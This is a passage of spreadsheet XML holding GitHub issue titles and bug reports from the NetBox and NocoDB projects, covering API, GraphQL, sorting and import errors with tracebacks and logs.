    <t>https://github.com/netbox-community/netbox/issues/18368</t>
  </si>
  <si>
    <t>Tags on MAC addresses can be created/accessed with the web UI but not the API</t>
  </si>
  <si>
    <t xml:space="preserve"> Deployment Type Self-hosted  Triage priority N/A  NetBox Version v4.2.1  Python Version 3.11  Steps to Reproduce Examine the API data for mac addresses: ![image](https://github.com/user-attachments/assets/66118a17-add8-46dc-8df1-8503b793e6c3) ![image](https://github.com/user-attachments/assets/9f1d45f7-15e3-4f8b-8a7a-9a0c831e1502)  Expected Behavior Tags can be created and retrieved with the API  Observed Behavior Tags cannot be created and retrieved with the API</t>
  </si>
  <si>
    <t>https://github.com/netbox-community/netbox/issues/18373</t>
  </si>
  <si>
    <t>Cannot Assign devices to Cluster</t>
  </si>
  <si>
    <t xml:space="preserve"> Deployment Type Self-hosted  Triage priority N/A  NetBox Version v.4.2.1  Python Version 3.11  Steps to Reproduce 1. Create a new Cluster, fill out only required fields 2. Click on Assign Device to Cluster, and fill out only required fields 3. Click Add Devices  Expected Behavior Device(s) are assigned to Cluster  Observed Behavior Server Error from NetBox  &lt;class 'AttributeError'&gt; 'Cluster' object has no attribute 'site' Python version: 3.11.2 NetBox version: 4.2.1 Plugins: netbox_branching: 0.5.2 netbox_device_view: 0.1.7 netbox_reorder_rack: 1.1.3 </t>
  </si>
  <si>
    <t>https://github.com/netbox-community/netbox/issues/18447</t>
  </si>
  <si>
    <t>Sort by MAC address crashes "interfaces" tab view</t>
  </si>
  <si>
    <t xml:space="preserve"> Deployment Type Self-hosted  NetBox Version v4.2.2  Python Version 3.11  Steps to Reproduce 1. Once logged in, clic "virtualization", 2. clic "Virtual machines" 3. clic a VM name which owns more than one interface (in order to be able to sort) 4. clic "interfaces" 5. clic to sort by "mac address". It's dead, you can not come back to ani "interfaces" tab anymore  Expected Behavior View "interfaces" tab like before MAC ADDRESS became an object.  Observed Behavior Server Error There was a problem with your request. Please contact an administrator. The complete exception is provided below: &lt;class 'django.core.exceptions.FieldError'&gt; Cannot resolve keyword 'mac_address' into field. Choices are: _name, bookmarks, bridge, bridge_id, bridge_interfaces, child_interfaces, created, custom_field_data, description, enabled, fhrp_group_assignments, id, ip_addresses, journal_entries, l2vpn_terminations, last_updated, mac_addresses, mode, mtu, name, parent, parent_id, primary_mac_address, primary_mac_address_id, qinq_svlan, qinq_svlan_id, subscriptions, tagged_items, tagged_vlans, tags, tunnel_terminations, untagged_vlan, untagged_vlan_id, virtual_machine, virtual_machine_id, vlan_translation_policy, vlan_translation_policy_id, vrf, vrf_id Python version: 3.11.2 NetBox version: 4.2.2 Plugins: None installed If further assistance is required, please post to the [NetBox discussion forum](https://github.com/netbox-community/netbox/discussions) on GitHub. [Home Page](http://netbox.sud.minint.fr/)</t>
  </si>
  <si>
    <t xml:space="preserve">not a rest api isuue </t>
  </si>
  <si>
    <t>the description says "Server Error There was a problem with your request. "</t>
  </si>
  <si>
    <t>https://github.com/netbox-community/netbox/issues/18585</t>
  </si>
  <si>
    <t>Filtering circuits by location not working</t>
  </si>
  <si>
    <t xml:space="preserve"> Deployment Type NetBox Cloud  NetBox Version v4.2.3  Python Version 3.11  Steps to Reproduce 1. Attach a location to a circuit as a termination point. 2. Go to the location and under "Related objects" click on circuits (or circuits terminations). 3. `https://netbox.local/circuits/circuits/?location_id=&lt;id&gt;`  Expected Behavior Only the attached circuit(s) show(s) up.  Observed Behavior Filter not working, all circuits are being displayed.</t>
  </si>
  <si>
    <t>https://github.com/netbox-community/netbox/issues/18605</t>
  </si>
  <si>
    <t>Prefix vlan assignment shows vlan for all sites but not only prefix's site</t>
  </si>
  <si>
    <t xml:space="preserve"> Discussed in https://github.com/netbox-community/netbox/discussions/18597 &lt;div type='discussions-op-text'&gt; &lt;sup&gt;Originally posted by **eudjinnl** February 7, 2025&lt;/sup&gt;  Deployment Type Self-hosted  NetBox Version v4.2.3  Python Version 3.10  Steps to Reproduce I have site Site1 configured Vlan Group for site configured: name VlanGroup1 Scope type: DCIM &gt; Site Site: Site1 Vlan configured: ID: 506 Vlan Group: VlanGroup1 Site: Site1 Now I create prefix and try to link it to vlan Scope type: DCIM &gt; Site Site: Site1  Expected Behavior Drop down list with vlans shows only vlans for VlanGroup1 (linked to Site1) like in NetBox v4.1.10  Observed Behavior Drop down list with vlans shows all vlans &lt;/div&gt;</t>
  </si>
  <si>
    <t>https://github.com/netbox-community/netbox/issues/18669</t>
  </si>
  <si>
    <t>Default values for custom_fields are ignored in API when custom_fields section is used</t>
  </si>
  <si>
    <t xml:space="preserve"> Deployment Type Self-hosted  NetBox Version v4.2.3  Python Version 3.12  Steps to Reproduce 1. Create multiple custom_fields with object type IPAM &gt; Prefix - primary_subnet, type: boolean, required: yes, default value: true - ripe_admin, type: text, required: no, default value: "xxx-RIPE" - ripe_tech, type: text, required:no - ripe_netname, type: text, required: no 2. Create a new prefix using API without custom_fields `{ "prefix": "10.0.0.0/24", "status": "active", "description": "Test prefix", "vlan": "147", "is_pool": false, "tenant": 6 }` 3. Create a new prefix using API with only "primary_subnet" as custom_field `{ "prefix": "10.0.0.0/24", "status": "active", "description": "Test prefix", "vlan": "147", "is_pool": false, "tenant": 6, "custom_fields": { "primary_subnet": true } }` 4. Create a new prefix using API with only "ripe_netname" as custom_field `{ "prefix": "10.0.0.0/24", "status": "active", "description": "Test prefix", "vlan": "147", "is_pool": false, "tenant": 6, "custom_fields": { "ripe_netname": "test" } }`  Expected Behavior 1. Custom fields are created 2. Prefix is created with default values for custom_fields primary_subnet and ripe_admin. Other custom_fields are null 3. Prefix is created with supplied value for custom_field primary_subnet, default value for ripe_admin. Other custom_fields are null 4. Prefix is created with default values for custom_fields primary_subnet and ripe_admin. ripe_netname gets the supplied value and ripe_tech remains null  Observed Behavior As soon as a custom_fields section is available in the POST Body then the default values for all custom_fields are ignored. When I do not send the custom_fields section at all then the default values are used correctly. 1. Custom fields are created (OK) 2. Prefix is created with default values for primary_subnet and ripe_admin (OK) 3. Prefix is created with primary_subnet set to true but other custom_fields are empty -&gt; default value for ripe_admin is ignored 4. Prefix is not created because primary_subnet (required) is not supplied -&gt; default value for primary_subnet is ignored</t>
  </si>
  <si>
    <t>https://github.com/netbox-community/netbox/issues/18738</t>
  </si>
  <si>
    <t>Script List is ignoring specified sort order of scripts</t>
  </si>
  <si>
    <t xml:space="preserve"> Deployment Type Self-hosted  NetBox Version v4.2.4  Python Version 3.12  Steps to Reproduce Create a custom script module with multiple scripts, specify custom sort order via script_order.  Expected Behavior Scripts in module are sorted das specified in script_order  Observed Behavior Scripts are sorted alphabetically by Script Class name</t>
  </si>
  <si>
    <t>https://github.com/netbox-community/netbox/issues/18833</t>
  </si>
  <si>
    <t>Inventory Item Bulk Import - 'InventoryItemImportForm' has no field named 'component_id'.</t>
  </si>
  <si>
    <t xml:space="preserve"> Deployment Type Self-hosted  NetBox Version v4.2.4  Python Version 3.10  Steps to Reproduce 1. Enter Data in Direct Import tab on Inventory Item Bulk Import page 2. Click Submit Data is in CSV format with headers: device name status role part_id serial description component_type component_name  Expected Behavior Inventory items should have been imported  Observed Behavior Server Error There was a problem with your request. Please contact an administrator. The complete exception is provided below: &lt;class 'ValueError'&gt; 'InventoryItemImportForm' has no field named 'component_id'. Python version: 3.10.12 NetBox version: 4.2.4 Plugins: netbox_topology_views: 4.2.0</t>
  </si>
  <si>
    <t>https://github.com/netbox-community/netbox/issues/18838</t>
  </si>
  <si>
    <t>Local Context Data can be set to non-none falsy values</t>
  </si>
  <si>
    <t xml:space="preserve"> Deployment Type Self-hosted  NetBox Version v4.2.5  Python Version 3.10  Steps to Reproduce 1. Edit a device in the UI (e.g. https://demo.netbox.dev/dcim/devices/37/) 2. Put in 0 as the local config context and save.  Expected Behavior Change gets rejected for not being correct JSON (like it does for any other flat values). Config Context also correctly rejects 0 or "" values.  Observed Behavior Change is accepted. ![Image](https://github.com/user-attachments/assets/07dfe041-dbc8-40cb-9b3a-f25fadc789d9) Relevant code: https://github.com/netbox-community/netbox/blame/v4.2.5/netbox/extras/models/configs.py#L202-L206 Happy to put up a PR for this.</t>
  </si>
  <si>
    <t>https://github.com/netbox-community/netbox/issues/18845</t>
  </si>
  <si>
    <t>Cannot sort Devices by device NAME</t>
  </si>
  <si>
    <t xml:space="preserve"> Deployment Type Self-hosted  NetBox Version v4.2.5  Python Version 3.12  Steps to Reproduce On any netbox with one or more devices: 1. Go to DEVICES &gt; Devices 2. Click the "NAME" column heading to sort by that field.  Expected Behavior Devices to be sorted by name.  Observed Behavior Nothing. Devices are not sorted by name. This also happens on the Demo NetBox: https://demo.netbox.dev/dcim/devices/?sort=name In this case, when the sort field is specified on the command line, you get:  Server Error There was a problem with your request. Please contact an administrator. The complete exception is provided below: &lt;class 'django.core.exceptions.FieldError'&gt; Cannot resolve keyword 'label' into field. Choices are: airflow, asset_tag, bookmarks, cabletermination, cluster, cluster_id, comments, config_template, config_template_id, console_port_count, console_server_port_count, consoleports, consoleserverports, contacts, created, custom_field_data, description, device_bay_count, device_type, device_type_id, devicebays, face, front_port_count, frontports, id, images, interface_count, interfaces, inventory_item_count, inventoryitems, journal_entries, last_updated, latitude, local_context_data, location, location_id, longitude, module_bay_count, modulebays, modules, name, oob_ip, oob_ip_id, parent_bay, platform, platform_id, position, power_outlet_count, power_port_count, poweroutlets, powerports, primary_ip4, primary_ip4_id, primary_ip6, primary_ip6_id, rack, rack_id, rear_port_count, rearports, role, role_id, serial, services, site, site_id, status, subscriptions, tagged_items, tags, tenant, tenant_id, vc_master_for, vc_position, vc_priority, vdcs, virtual_chassis, virtual_chassis_id, virtual_machines Python version: 3.12.9 NetBox version: 4.2.4 Plugins: netbox_demo: 0.5.0 </t>
  </si>
  <si>
    <t>https://github.com/netbox-community/netbox/issues/18872</t>
  </si>
  <si>
    <t>Treatment of `kind` field on JournalEntry is inconsistent</t>
  </si>
  <si>
    <t xml:space="preserve"> Deployment Type NetBox Cloud  NetBox Version v4.2.5  Python Version 3.10  Steps to Reproduce 1. View a site and click the "Journal" tab. 2. Add a journal entry without specifying a kind.  Expected Behavior The `kind` field should always be required (AFAICT): python class JournalEntry(): kind = models.CharField( verbose_name=_('kind'), max_length=30, choices=JournalEntryKindChoices, default=JournalEntryKindChoices.KIND_INFO )   Observed Behavior The `kind` field is not required by either the model's form or its REST API serializer. python class JournalEntryForm(NetBoxModelForm): kind = forms.ChoiceField( label=_('Kind'), choices=add_blank_choice(JournalEntryKindChoices), required=False )  python class JournalEntrySerializer(NetBoxModelSerializer): kind = ChoiceField( choices=JournalEntryKindChoices, required=False ) </t>
  </si>
  <si>
    <t>https://github.com/netbox-community/netbox/issues/18884</t>
  </si>
  <si>
    <t>`deserialize_object()` does not account for resolved tags in object data</t>
  </si>
  <si>
    <t xml:space="preserve"> Deployment Type NetBox Cloud  NetBox Version v4.2.5  Python Version 3.10  Steps to Reproduce 1. Create an object with one or more tags assigned. (In this example, we use a tenant.) 2. Serialize the object using the `serialize_object()` utility function. python from pprint import pprint from tenancy.models import Tenant from utilities.serialization import serialize_object, deserialize_object tenant = Tenant.objects.first() data = serialize_object(tenant) pprint(data)  The output data is below: python {'comments': '', 'created': '2020-12-19T00:00:00Z', 'custom_fields': {'cust_id': 'CYB01'}, 'description': '', 'group': 1, 'last_updated': '2025-03-12T18:02:59.743Z', 'name': 'Cyberdyne Systems', 'slug': 'cyberdyne', 'tags': ['Alpha', 'Bravo', 'Charlie']}  3. Attempt to deserialize the serialized data back into the object. python deserialize_object(Tenant, data)   Expected Behavior `deserialize_object()` should return the deserialized object with all attributes set correctly.  Observed Behavior A DeserializationError is raised:  django.core.serializers.base.DeserializationError: ['Alpha value must be an integer.']: (tenancy.tenant:pk=None) field_value was 'Alpha'  This occurs because the function does not account for the tags being specified by name rather than by numeric primary key.</t>
  </si>
  <si>
    <t>https://github.com/netbox-community/netbox/issues/18887</t>
  </si>
  <si>
    <t>VMInterface' object has no attribute 'get'</t>
  </si>
  <si>
    <t xml:space="preserve"> Deployment Type Self-hosted  NetBox Version 4.2.2  Python Version 3.11  Steps to Reproduce I am trying to associate a VM interface to a prefix via custom field, using Pynetbox python new_prefix.custom_fields['workflow_associated_prefix_to_interface_mapping'] = nb_interface.id new_prefix.save()  This is the custom field ![Image](https://github.com/user-attachments/assets/5f52bba8-e55c-4c27-adc0-59d08a5866b5) If I comment out the custom_field statement, save is fine. I also tried saving via UI with the relationship, UI worked fine.  Expected Behavior Saving works.  Observed Behavior And I got this error  pynetbox.core.query.RequestError: The request failed with code 500 Internal Server Error: {'error': "'VMInterface' object has no attribute 'get'", 'exception': 'AttributeError', 'netbox_version': '4.2.2', 'python_version': '3.11.2'}  It appears this is the line that threw the error: &lt;img width="1319" alt="Image" src="https://github.com/user-attachments/assets/4f99eb14-b4c7-40e2-bbe7-3307f28e11a0" /&gt; python def validate(self, data): # Validate many-to-many VLAN assignments virtual_machine = self.instance.virtual_machine if self.instance else data.get('virtual_machine') &lt; for vlan in data.get('tagged_vlans', []): if vlan.site not in [virtual_machine.site, None]: raise serializers.ValidationError({ 'tagged_vlans': f"VLAN {vlan} must belong to the same site as the interface's parent virtual " f"machine, or it must be global." })  Somehow data is already a VMInterface object</t>
  </si>
  <si>
    <t>https://github.com/netbox-community/netbox/issues/18949</t>
  </si>
  <si>
    <t>The TenantType in GraphQL is missing the contacts property</t>
  </si>
  <si>
    <t xml:space="preserve"> Deployment Type Self-hosted  NetBox Version v4.2.5  Python Version 3.10  Steps to Reproduce 1. Create a tenant (assuming ID 1) 2. Create a contact (assuming with name "John") 3. Add a contact assignment to the tenant 4. Execute the GraphQL query: graphql query { tenant(id: 1) { contacts { contact { name } } } }   Expected Behavior Query returns: json { "data": { "tenant": { "contacts": [ { "contact": { "name": "John" } } ] } } }   Observed Behavior Query returns contacts on TenantType does not exist: json { "data": null, "errors": [ { "message": "Cannot query field 'contacts' on type 'TenantType'. Did you mean 'comments'?", "locations": [ { "line": 3, "column": 5 } ] } ] } </t>
  </si>
  <si>
    <t>https://github.com/netbox-community/netbox/issues/18991</t>
  </si>
  <si>
    <t>Path tracing broken for front/rear ports in REST API</t>
  </si>
  <si>
    <t xml:space="preserve"> Deployment Type Self-hosted  NetBox Version v4.2.6  Python Version 3.12  Steps to Reproduce 1. Go to https://[SERVER_URL]/api/dcim/rear-ports/ 2. Select any existing port by clicking on its "url" 3. The REST API now display the data for a single port, for example: https://[SERVER_URL]/api/dcim/rear-ports/70479/ 4. Append "paths/" to this URL: https://[SERVER_URL]/api/dcim/rear-ports/70479/paths  Expected Behavior The REST API should return the CablePaths which traverse the given pass-through port.  Observed Behavior 'AttributeError' is raised.  'NoneType' object has no attribute 'model'  This error is not observed on NetBox 4.2.5 I believe this may have been introduced by https://github.com/netbox-community/netbox/pull/18826 ?</t>
  </si>
  <si>
    <t>https://github.com/netbox-community/netbox/issues/18999</t>
  </si>
  <si>
    <t>GraphQL: Querying for Manufacturer on Inventory-Items leads to nun-null error</t>
  </si>
  <si>
    <t xml:space="preserve"> Deployment Type Self-hosted  NetBox Version v4.2.5  Python Version 3.10  Steps to Reproduce Reproducable on demo.netbox.dev. Also on v4.2.6 in our environment 1. Create a Inventory-Item on any device and leave the manufacturer blank (as it is not required 2. Query the following graph-ql (with the specific device-id):  query { device(id:172) {id name inventoryitems {id name manufacturer{id name }   Expected Behavior Output of Device with given Inventory-Items and manufacturer to be null (i.e. like if tenant is not set):  { "data": { "device": { "id": "172", "name": "0634LEO", "inventoryitems": [ { "id": "1", "name": "Test", "manufacturer": null } ] } } }   Observed Behavior Error raised that manufacturer cannot be null:  { "data": null, "errors": [ { "message": "Cannot return null for non-nullable field InventoryItemType.manufacturer.", "locations": [ { "line": 2, "column": 68 } ], "path": [ "device", "inventoryitems", 0, "manufacturer" ] } ] } </t>
  </si>
  <si>
    <t>https://github.com/netbox-community/netbox/issues/19166</t>
  </si>
  <si>
    <t>"base_choices" is not working in custom field choice bulk import</t>
  </si>
  <si>
    <t xml:space="preserve"> Deployment Type Self-hosted  NetBox Version v4.2.6  Python Version 3.11  Steps to Reproduce 1. Click in "Bulk import" in "Custom Field Choices" 2. Set data to:   name: Choices description: order_alphabetically: False base_choices: ISO_3166 extra_choices:  3. Set format to `YAML` 4. Click "Submit" button  Expected Behavior A new custom field choice should have been created with the selected base choices.  Observed Behavior An error "Must define base or extra choices" was raised</t>
  </si>
  <si>
    <t>https://github.com/netbox-community/netbox/issues/19225</t>
  </si>
  <si>
    <t>GraphQL filter functionality missing in v4.3.0-beta1</t>
  </si>
  <si>
    <t xml:space="preserve"> Deployment Type Self-hosted  NetBox Version v4.3.0-beta1  Python Version 3.12  Steps to Reproduce 1. Attempt to write a GraphQL query to filter `circuit_list` by 1 or more sites. Or filter an `ip_address_list` by the device or VM they belong to.  Expected Behavior Filters exist to filter circuits by the site one of their terminations belongs to, filters exist to filter IP addresses based on the device or virtual machine they're attached to. Example query for circuits based on site entries that works pre-4.2: graphql query siteCircuits($sites: [String!]) { circuit_list(filters: {site: $sites}) { id cid provider { name } termination_z { termination {  on SiteType { id name } } } } }  The `$sites` variable is:  { "sites": [ "dm-albany", "dm-rochester" ] }   Observed Behavior No filters exist to do this on IPAddress or Circuit filter options in GraphQL in 4.3-beta1. For circuits, the closest I can get is 'reversing' the query and querying circuit terminations instead. graphql query MyQuery { circuit_termination_list( filters: {termination_type: {app_label: {exact: "dcim"}, model: {exact: "site"}}, termination_id: "7"} ) { termination {  on SiteType { id name } } term_side circuit { cid commit_rate install_date id provider { id name } provider_account { account id name } } } }  However: this requires the NetBox ID of the site to be known (instead of being able to use the slug today), and the only way to filter on multiple related-object IDs is to do a verbose "OR" operator instead of being able to do `termination_id: {in_list: [1, 2, 3, 4]}` (for circuit terminations, not circuits). In the case of IP Addresses you can't even do a filter such as `assigned_object_id: {in_list: [1, 2, 3, 4]}` (for IP Addresses) using multiple interface IDs from a single device. As has always been the case since GraphQL was introduced, you could write a more "indirect" query starting with the device_list, and adding interfaces for the device, and each interface's IP Addresses nested within, but this is a significant change from previous behavior and also limits the flexibility &amp; functionality of the GraphQL API. There maybe be other GraphQL objects that are impacted, these are just the two most immediate cases that I've uncovered. Not being able to filter by multiple IDs (even using standard GraphQL syntax of "`some_object_id: {in_list: [1, 2, 3, 4]}`") is a big hindrance, but being able to filter by indirect relationships is very valuable and is how the NetBox GraphQL API has worked for quite a while now.</t>
  </si>
  <si>
    <t>https://github.com/netbox-community/netbox/issues/19230</t>
  </si>
  <si>
    <t>Inconsistent behaviour with Label on front port when using range</t>
  </si>
  <si>
    <t xml:space="preserve"> Deployment Type Self-hosted  NetBox Version v4.2.7  Python Version 3.10  Steps to Reproduce 1. Go to Device 2. Add "Add a new front Port" 3. Select Device 4. Give name [0-9] 5. **Give Label without range** 6. Assign Type 7. Assign Rear Port  Expected Behavior The front connections should be added with the **same** label  Observed Behavior Error: "The provided pattern specifies 1 values, but 10 are expected." It is not possible to add several front ports through range with the same label. But it is possible to edit all of them at once afterwards and set the same label for all of them. ![Image](https://github.com/user-attachments/assets/d85f70ca-5ee8-4a3d-ae9c-c8a107e46cef) ![Image](https://github.com/user-attachments/assets/be270206-a059-4c9a-a179-c58a0d4a8efe) Follow up Issue of #19041</t>
  </si>
  <si>
    <t>https://github.com/netbox-community/netbox/issues/19279</t>
  </si>
  <si>
    <t>Inventory Item Bulk Add requires field "status"</t>
  </si>
  <si>
    <t xml:space="preserve"> Deployment Type Self-hosted  NetBox Version v4.2.8  Python Version 3.12  Steps to Reproduce 1. select multiple devices 2. press add inventory item 3. fill required field "name" 4. apply 5. fail because "status" field is mandatory and missing.  Expected Behavior Inventory items should be added with Active status by default or editable field should be available at UI form  Observed Behavior &lt;class 'ValueError'&gt; 'InventoryItemBulkCreateForm' has no field named 'status'.</t>
  </si>
  <si>
    <t>https://github.com/netbox-community/netbox/issues/19281</t>
  </si>
  <si>
    <t>Unable to create a service from a template</t>
  </si>
  <si>
    <t xml:space="preserve"> Deployment Type Self-hosted  NetBox Version v4.2.8  Python Version 3.10  Steps to Reproduce 1. Create a device with at least one interface. 2. Assign an IP address to an interface on the device. 3. Create a service template for e.g. TCP/443. 4. Click "add a service" under the device view. This will present the service creation form with the current device already selected. 5. Select the service template and IP address, then click "create."  Expected Behavior The service should be created.  Observed Behavior No action is taken. The form does not appear to be submitted.</t>
  </si>
  <si>
    <t>https://github.com/netbox-community/netbox/issues/19322</t>
  </si>
  <si>
    <t>Bulk import URL path is incorrect</t>
  </si>
  <si>
    <t xml:space="preserve"> Deployment Type Self-hosted  NetBox Version v4.2.8  Python Version 3.10  Steps to Reproduce 1. Navigate to the bulk import view for any object type (e.g. sites).  Expected Behavior The URL should end in `/import/` (e.g. `/dcim/sites/import/`).  Observed Behavior The URL ends with `/bulk_import/` (the view name). I believe this is an inadvertent change from #17752, which was implemented in v4.2.0. Each of the bulk import views should specify a `path` similar to the bulk edit &amp; bulk delete views: python @register_model_view(Site, 'bulk_import', path='import', detail=False) class SiteBulkImportView(generic.BulkImportView):  </t>
  </si>
  <si>
    <t>https://github.com/nocodb/nocodb/issues/11</t>
  </si>
  <si>
    <t>dynamic is not working</t>
  </si>
  <si>
    <t>Hi team, first of all star to your efforts &lt;3 I am sending an post request to dynamic api, but system is not response as required as it through 404 error, ajax code: `$(document).ready(function(){ $.ajax({ url: 'http://127.0.0.1:3000/dynamic', method: 'POST', data:{ "query": "select * from ?? limit 20", "params": ["issuedetailsv3"] }, success: function (data){ console.log(data); }, error : function (){ console.log('this is an error'); } }) });` following errors, &gt; POST http://127.0.0.1:3000/dynamic 404 (Not Found) &gt; POST /dynamic 404 147 - 3.395 ms Please provide dev environment versions of your system node -v v9.0.0 ( xmysql requires node &gt;= 7.6.0 ) npm -v 5.5.1 mysql --version 5.7.20 xmysql --version 0.2.0 - - - Provide steps to reproduce this issue or Provide minimum code to reproduce this issue or HTTP request,response,error snapshot of this issue - - - Mark issue with suitable label if it is clear what this issue is.</t>
  </si>
  <si>
    <t>https://github.com/nocodb/nocodb/issues/23</t>
  </si>
  <si>
    <t>SQL Syntax error when posting</t>
  </si>
  <si>
    <t>Good morning, When I try to make a POST request on my Customer table to insert a row it doesn't work. I got a SQL syntax error : "error": { "code": "ER_PARSE_ERROR", "errno": 1064, "sqlMessage": "You have an error in your SQL syntax; check the manual that corresponds to your MariaDB server version for the right syntax to use near '' at line 1", "sqlState": "42000", "index": 0, "sql": "INSERT INTO `customer` SET " } Did somebody already had this issue ?</t>
  </si>
  <si>
    <t>https://github.com/nocodb/nocodb/issues/24</t>
  </si>
  <si>
    <t>While joining two tables if some columns have same name then I am not able to select all column names (Only all unique column names are displaying in the output).</t>
  </si>
  <si>
    <t>If I am using _fileds and trying to select columns which have the common name then also in the output only one column is displaying. Not getting the option to alias column name. **Example**: _Table1_ : User(id, name, email, city_id) _Table2_: City(id, name) _query_: /api/xjoin?_join=u.user,_lj,c.city&amp;_on1=(u.city_id,eq,c.id)&amp;_fields=u.id,u.name,c.id,c.name _Output_: [{ id: 1, name : "xxx" },{ id : 2, name : "yyy" }] _Expected Output_: [{ id: 1, name : "xxx", id: 1, name : "city1" },{ id : 2, name : "yyy", id: 2, name : "city2" }]</t>
  </si>
  <si>
    <t>https://github.com/nocodb/nocodb/issues/33</t>
  </si>
  <si>
    <t>Max page size is actually 99, not 100</t>
  </si>
  <si>
    <t>Please provide dev environment versions of your system node -v = v9.4.0 ( xmysql requires node &gt;= 7.6.0 ) npm -v = 5.6.0 mysql --version = mysql Ver 14.14 Distrib 5.5.60, for debian-linux-gnu (x86_64) using readline 6.3 xmysql --version = 0.0.4 - - - http://api.xyz.com/api/invitations?_size=100 returns 20 rows (incorrect) http://api.xyz.com/api/invitations?_size=99 returns 54 rows (correct) (please remove domain names after issue has been reproduced on your end) Also note that it's strange behavior that when a requested page size goes over the system limit, then it simply reverts back to the default 20. Would be better if API would throw an error code to indicate something went wrong. - - - Mark issue with suitable label if it is clear what this issue is. ( edit: removed domain name )</t>
  </si>
  <si>
    <t>https://github.com/nocodb/nocodb/issues/40</t>
  </si>
  <si>
    <t>Command always detects one table</t>
  </si>
  <si>
    <t>node -v ( xmysql requires node &gt;= 7.6.0 ) v8.11.1 npm -v 5.6.0 mysql --version 8.0.11 xmysql --version 0.4.8 - - - When I run the command given in the README, the tool detecs one table only and generates 29 APIs, all of which are referencing a table named 'undefined', however the /tables API returns the correct database tables but their APIs are not generated. I tried on a database of mine as well as classicmodels database that is used in the tests. - - -</t>
  </si>
  <si>
    <t>https://github.com/nocodb/nocodb/issues/65</t>
  </si>
  <si>
    <t>Wordpress xjoin</t>
  </si>
  <si>
    <t>I'm trying to join two wordpress tables unsuccesfully with this xjoin query: /xjoin?_join=pl.wp_posts,_j,pr.wp_postmeta&amp;_on1=(pl.ID,eq,pr.post_id)&amp;_fields=pl.ID,pr.post_id but I keep getting error 404, any hint? This should be equal to SQL join: SELECT pl.ID, pr.post_id FROM wp_posts as pl JOIN wp_postmeta as pr ON pl.ID = pr.post_id</t>
  </si>
  <si>
    <t>https://github.com/nocodb/nocodb/issues/185</t>
  </si>
  <si>
    <t>Bug: Plus Email Address Not Accepted</t>
  </si>
  <si>
    <t>Version: 0.9.15 Docker When attempting to create a new user that has a "+" in the Email address, an "E-mail must be valid" error is returned. Plus addressing is valid per [RFC 2822](http://tools.ietf.org/html/rfc2822#section-3.4.1) and is supported by major Email providers such as Gmail and Office 365/Exchange to name a few. **Steps to Replicate** - Open a Project - Click "Team &amp; Auth" - Click "New User" - Attempt to create a user with a "+" in the address, such as "validation+bug@nocodb.com" - Observe the "E-mail must be valid" message **What is Expected?** The Email is valid per RFC spec and should be allowed.</t>
  </si>
  <si>
    <t>https://github.com/nocodb/nocodb/issues/238</t>
  </si>
  <si>
    <t>Server doesn't restart if incorrect endpoint is entered in the minio settings.</t>
  </si>
  <si>
    <t xml:space="preserve">Error Logs from the docker logs -   POST /dashboard/?q=sqlOp_xcVirtualTableUpdate 200 1 - 9.886 ms (node:7) Warning: Label 'fetch user' already exists for console.time() Creating REST APIs pg - &gt; xcdb InvalidEndpointError: Invalid endPoint : https://s3.fr-par.scw.cloud at new Client (/usr/src/app/node_modules/minio/dist/main/minio.js:93:13) at _0x57a864.init (/usr/src/app/docker/main.js:1211:6082) at _0x40b070.init (/usr/src/app/docker/main.js:1211:3779) at _0x49f755.init (/usr/src/app/docker/main.js:1079:2832) at processTicksAndRejections (internal/process/task_queues.js:97:5) at async _0x2c831f.initHandler (/usr/src/app/docker/main.js:89:5677) at async _0x18a585.init (/usr/src/app/docker/main.js:23:10140) at async /usr/src/app/docker/main.js:309:36863 </t>
  </si>
  <si>
    <t>https://github.com/nocodb/nocodb/issues/241</t>
  </si>
  <si>
    <t>Confusing "Sign up" button loading state</t>
  </si>
  <si>
    <t>EDIT: See first comment below. Hi! While trying to explore nocodb I hit an issue on superuser sign up: as soon as I input a password, the Signup button freezes in an inactive loading state. This happens in Firefox an Chromium. I run nocodb with the following command: `podman run -d --name nocodb -p 8080:8080 --net=host nocodb/nocodb` (I need `--net=host` to access a database running on the host, in fact `-p` is redundant in this case.) In the logs I can see a suspicious 404: `POST /api/v1/auth/refresh-token 404 165 - 1.007 ms`. ![Screenshot 2021-06-07 at 09-58-56 Sign Up Noco](https://user-images.githubusercontent.com/479389/120974051-5ae6a500-c778-11eb-8ea4-6770c9e8ec0f.png) &lt;details&gt;&lt;summary&gt;Full log&lt;/summary&gt; &lt;pre&gt; App started successfully. Visit -&gt; http://localhost:8080/dashboard GET / 302 64 - 13.886 ms GET /dashboard 301 185 - 2.510 ms GET /dashboard/ 200 2855 - 6.491 ms GET /dashboard/_nuxt/3905e44.js 200 3732 - 10.191 ms GET /dashboard/_nuxt/44db1cc.js 200 209471 - 8.751 ms GET /dashboard/_nuxt/6bd9d66.js 200 245540 - 8.778 ms GET /dashboard/_nuxt/be8fb6e.js 200 1897780 - 8.907 ms GET /dashboard/_nuxt/333a606.js 200 29825 - 5.407 ms GET /dashboard/_nuxt/dfacdf9.js 200 27029 - 5.999 ms GET /dashboard/_nuxt/5641aa5.js 200 72112 - 2.332 ms POST /dashboard/?q=sqlOp_xcPluginRead 401 70 - 2.995 ms POST /api/v1/auth/refresh-token 404 165 - 1.723 ms GET /dashboard/auth/type 200 222 - 2.280 ms GET /dashboard/favicon-32.png 200 1749 - 1.744 ms GET /dashboard/ 304 - - 2.833 ms GET /dashboard/_nuxt/3905e44.js 304 - - 6.835 ms GET /dashboard/_nuxt/44db1cc.js 304 - - 8.020 ms GET /dashboard/_nuxt/be8fb6e.js 304 - - 7.614 ms GET /dashboard/_nuxt/6bd9d66.js 304 - - 7.398 ms GET /dashboard/_nuxt/333a606.js 304 - - 4.110 ms GET /dashboard/_nuxt/dfacdf9.js 304 - - 3.484 ms GET /dashboard/_nuxt/5641aa5.js 304 - - 1.759 ms POST /dashboard/?q=sqlOp_xcPluginRead 401 70 - 1.330 ms POST /api/v1/auth/refresh-token 404 165 - 1.214 ms GET /dashboard/auth/type 304 - - 2.357 ms GET /dashboard/db/mysql.png.jpg 200 3132 - 12.526 ms GET /dashboard/db/mssql.png.jpg 200 3619 - 12.299 ms GET /dashboard/db/postgre.png.jpg 200 3892 - 11.900 ms GET /dashboard/db/maria.png.jpg 200 3304 - 11.474 ms GET /dashboard/db/aurora.png 200 2511 - 10.915 ms GET /dashboard/_nuxt/img/512x512-trans.5601bce.png 200 246642 - 12.990 ms GET /dashboard/db/sqlite.svg 200 9886 - 2.777 ms GET /dashboard/_nuxt/c66fc74.js 200 21982 - 1.985 ms GET /dashboard/_nuxt/fonts/MaterialIcons-Regular.12a47ed.woff2 200 60840 - 7.764 ms GET 